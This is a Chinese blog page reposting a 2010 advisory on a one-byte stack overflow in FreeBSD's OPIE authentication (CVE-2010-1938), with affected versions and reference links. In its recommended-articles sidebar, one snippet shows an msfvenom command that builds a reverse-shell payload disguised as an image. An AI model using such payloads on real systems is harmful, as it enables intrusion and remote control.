FreeBSD OPIE "__opiereadrec()" 单字节栈内存破坏漏洞

最新推荐文章于 2024-01-19 22:44:27 发布
最新推荐文章于 2024-01-19 22:44:27 发布
阅读量853 收藏
点赞数
分类专栏: 嵌入式系统 文章标签: freebsd 2010
FreeBSD OPIE "__opiereadrec()" 单字节栈内存破坏漏洞

漏洞编号: NIPC-2010-2044
CVE编号: CVE-2010-1938
漏洞类别: 数值错误
发布日期: 2010-05-28
更新日期: 2010-05-31
CVSS值: 9.3
严重级别: 紧急
利用范围: 远程
攻击复杂度:
认证级别: 无认证
机密性影响: 完全
完整性影响: 完全
可用性影响: 完全
漏洞描述:

FreeBSD6.4 至 8.1-PRERELEASE版本所使用的OPIE 2.4.1-test1 及之前版本认证系统中readrec.c文件的__opiereadrec()函数存在单字节栈溢出漏洞,攻击者利用该漏洞可能引起拒绝服务攻击或通过长 username字符串执行任意代码。

 

受影响系统或软件:
freebsd,freebsd,6.4
freebsd,freebsd,6.4,release
freebsd,freebsd,6.4,release_p2
freebsd,freebsd,6.4,release_p3
freebsd,freebsd,6.4,release_p4
freebsd,freebsd,6.4,release_p5
freebsd,freebsd,6.4,stable
freebsd,freebsd,6,stable
freebsd,freebsd,7.0
freebsd,freebsd,7.0-release
freebsd,freebsd,7.0,beta_4
freebsd,freebsd,7.0,current
freebsd,freebsd,7.0,pre-release
freebsd,freebsd,7.0,release
freebsd,freebsd,7.0,release-p12
freebsd,freebsd,7.0,release-p8
freebsd,freebsd,7.0,release-p9
freebsd,freebsd,7.0,releng
freebsd,freebsd,7.0,stable
freebsd,freebsd,7.0_beta4
freebsd,freebsd,7.0_releng
freebsd,freebsd,7.1
freebsd,freebsd,7.1,pre-release
freebsd,freebsd,7.1,rc1
freebsd,freebsd,7.1,release-p1
freebsd,freebsd,7.1,release-p2
freebsd,freebsd,7.1,release-p4
freebsd,freebsd,7.1,release-p5
freebsd,freebsd,7.1,release-p6
freebsd,freebsd,7.1,stable
freebsd,freebsd,7.2
freebsd,freebsd,7.2,pre-release
freebsd,freebsd,7.2,stable
freebsd,freebsd,8.0

 

解决方案:
厂商已经发布安全 更新。

 

参考资源:

http://www.securityfocus.com/bid/40403 http://site.pi3.com.pl/adv/libopie-adv.txt http://securitytracker.com/id?1024040 http://securityreason.com/securityalert/7450 http://securityreason.com/achievement_securityalert/87 http://security.FreeBSD.org/advisories/FreeBSD-SA-10:05.opie.asc http://secunia.com/advisories/39966 http://secunia.com/advisories/39963 http://blog.pi3.com.pl/?p=111

hack8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FreeBSD BSDiff 被曝高危内存损坏漏洞,时隔4年终修复
smellycat000的专栏
07-13 1157
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Bsdiff和bspatch分别是构建二进制文件和响应的打补丁工具,它们能够有效地为应用程序更新机制应用二进制补丁。漏...
【工具】Nmap
尚未佩妥剑 转眼便江湖
12-02 7813
Nmap工具帮助说明 语法: nmap [扫描类型] [选项] [目标规范] 目标规范 可以传递主机名、IP地址、域名等。可以指定单个IP或IP段 eg:192.168.1.0/24、192.168.1.1,2,3-15 -iL <filename>:从文件中导入扫描目标 eg:nmap -iL ip.txt -iR <num hosts>:随机选择目标,参数指定N...
脚本引擎:Nmap Scripting Engine
Vdieoo的博客
11-12 977
Nmap最强大,最灵活的功能之一NSE脚本引擎 它允许用户自己编写脚本来执行自动化的操作或者扩展Nmap的功能,使用lua语言 基本使用 NSE默认就提供了丰富的脚本库,可以为我们提供诸多Nmap的扩展使用,它的设计初衷主要考虑了一下几个方面: 网络发现 版本侦察 漏洞侦察 后门侦察 漏洞利用 nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式及进行比较笼统的扫描 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域...
Nmap的漏洞利用脚本初探
a1b2c3是弱口令
03-16 8163
Nmap的漏洞利用脚本初探 made by tdcoming! 1.概述 使用nmap进行扫描的时候,总会去结合者使用一些漏洞发现利用的脚本!但是呢,namp到底还有多少“秘密”!今天打算去研究一波,看看会不会舔到什么包,至少学习的路上不停的“跑毒”还是很有必要的! 2.开启脚本封印 正确的解开封印的姿势: cd /usr/share/nmap/scripts #进入nm...
CVE-2020-1938 Tomcat 文件读取包含漏洞复现
yzl_007的博客
07-26 2521
CVE-2020-1938 Tomcat 文件读取包含漏洞复现 一次偶然的契机,起源于自己的站被日了,太菜了没找到原因,然后逛了逛室友的站,室友的友链中随便点了点友链什么的,发现shadon发现开了很多端口,并且同时打开了8009和8080 想到最近爆出的文件包含漏洞,扫一下果真存在,也验证成功了,读取到了web.xml的源码 用网上的脚本跑一下,读取WEB-INF/web.xml文件 读取ROOT目录下的build.xml文件内容,没用这个文件,就会跳转到错误页面 下面是自己搭建环境后的CVE-
FreeBSD内核优化.zip_FreeBSD 优化_pinkeoq
09-24
FREEBSD优化指南,内核优化指南。分享给大家
FreeBSD_Manual.rar_BSD_freebsd_linux manual
09-19
FreeBSD 中文使用手册 本手册适用于安装 FreeBSD 5.4-RELEASE 和 FreeBSD 6.0-RELEASE 以及它们的日常使用。
freebsd.tar.gz_BSD_FreeBSD内核源码_freebsd source_freebsd.tar_linux
09-23
freebsd v4.4内核源码,适合内核源代码爱好者下载学习
freebsd.rar_freebsd_freebsd教程
09-24
freebsd入门教程,适合初学者的freebsd教程
六个系统安装方法及其应用.rar_Linux 安装_freebsd_solaris_系统安装_网络安装系统
09-14
六个系统安装方法及其应用(solaris,freebsd,linux,windows98,2k,xp) 从网络上搜集整理
CVE2020-1938漏洞复现
最新发布
hellodaoyan的博客
01-19 1855
这个漏洞是tomcat的 然后我们先了解漏洞产生的原理 首先我们先来看tmocat纠结是干什么的 tomcat是个中间件 最主要的两个结构、 servlet的定义和部分源码, 漏洞就是从这来的 tomcat处理http请求 源码分析 tomcat 8.5.46 哎 这教学视频讲半天看不懂 不看原理了 java 我都没学过 很多 只会hello world 直接实操吧 浪费我30min时间 直接开始复现 docker 开始搭建环境 我们的主机下载好后 随遍拖
CVE-2020-1938漏洞复现
Ch_an_ger的博客
06-18 1772
一、漏洞描述 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat 上所有webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、Tomcat任意文件读取漏洞 Tomcat默认开启AJP服务,运行在8009端口,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。 tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRe
【工具使用】CVE-2020-1938批量扫描工具
Sud0day的博客
03-18 2254
【工具使用】CVE-2020-1938批量扫描工具 0x01前言 昨天刚发的复现文章,今天在github上一看就有批量工具了,索性今天写下工具的使用笔记。(工具并非本人所写,如有任何问题请联系作者,结尾有链接) 0x02工具使用 https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner 1.将目标地址放入ip.txt文本中。 ...
CVE-2020-1938(RCE利用)
热门推荐
午夜安全
03-27 1万+
CVE-2020-1938(RCE利用) 1.使用msf生成反弹shell马,并且监听 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png 假设利用上传点,把此图片上传到了目标服务器/log/shell.png。 在msf监听: msf > use expl...
渗透测试-Tomcat文件读取漏洞复现
道阻且长,行则将至。
06-21 2860
漏洞介绍 Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat 文件包含漏洞(CNVD-2020-10487 / CVE-2020-1938)。该漏洞的危害等级:高。目前厂商已发布新版本完成漏洞的修复。 漏洞简介 CVE-2020-1938 漏洞是由长亭科技安全研究员发现的存在于 Tomcat 中的安
FreeBSD 8.1-RELEASE 官方正式发布
pressurized solar water heater
07-26 292
<br />前几天有 FreeBSD 8.1 的正式版 ISO 泄漏,今天官方重要发布了该版本。<br />详情请看这里 。<br />FreeBSD 8.1 主要改进内容:<br />zpool version of ZFS subsystem updated to version 14<br />NFSv4 ACL support in UFS and ZFS; support added to cp(1), find(1), getfacl(1), mv(1), and setfacl(1) uti
freebsd tcp_input.c
05-29
而tcp_input.c是FreeBSD操作系统中TCP协议栈的实现文件之一,它包含了TCP协议栈中的输入处理函数。具体来说,这个文件中的函数会处理TCP数据包的接收、分段、重新组装、状态维护等操作。当一个TCP数据包到达FreeBSD...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值